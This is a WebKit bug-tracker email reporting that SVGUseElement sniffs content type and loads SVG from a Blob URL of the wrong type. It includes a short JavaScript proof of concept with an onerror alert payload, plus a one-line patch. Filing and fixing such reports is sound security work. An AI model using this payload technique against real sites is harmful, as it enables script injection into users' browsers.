[Webkit-unassigned] [Bug 249948] New: SVGUseElement sniffs content type when loading external document

[bugzilla-daemon at webkit.org]

https://bugs.webkit.org/show_bug.cgi?id=249948

            Bug ID: 249948
           Summary: SVGUseElement sniffs content type when loading
                    external document
           Product: WebKit
           Version: WebKit Nightly Build
          Hardware: Unspecified
                OS: Unspecified
            Status: NEW
          Severity: Normal
          Priority: P2
         Component: SVG
          Assignee: webkit-unassigned at lists.webkit.org
          Reporter: s.h.h.n.j.k at gmail.com
                CC: sabouhallawa at apple.com, zimmermann at kde.org

PoC:

```
const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`;
const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml"
const url = URL.createObjectURL(blob);
let attackerControlledString = url + "#x";
const svg=document.createElementNS("http://www.w3.org/2000/svg", "svg");
const use=document.createElementNS("http://www.w3.org/2000/svg", "use");
use.setAttribute('href', attackerControlledString);
svg.appendChild(use);
document.body.appendChild(svg);
```

The above code only loads external SVG from a Blob URL in Webkit. Both Blink and Gecko ignores it due to content type mismatch.

Potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614.

```
options.sniffContent = ContentSniffingPolicy::DoNotSniffContent;
```

-- 
You are receiving this mail because:
You are the assignee for the bug.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.webkit.org/pipermail/webkit-unassigned/attachments/20221229/01857b2b/attachment.htm>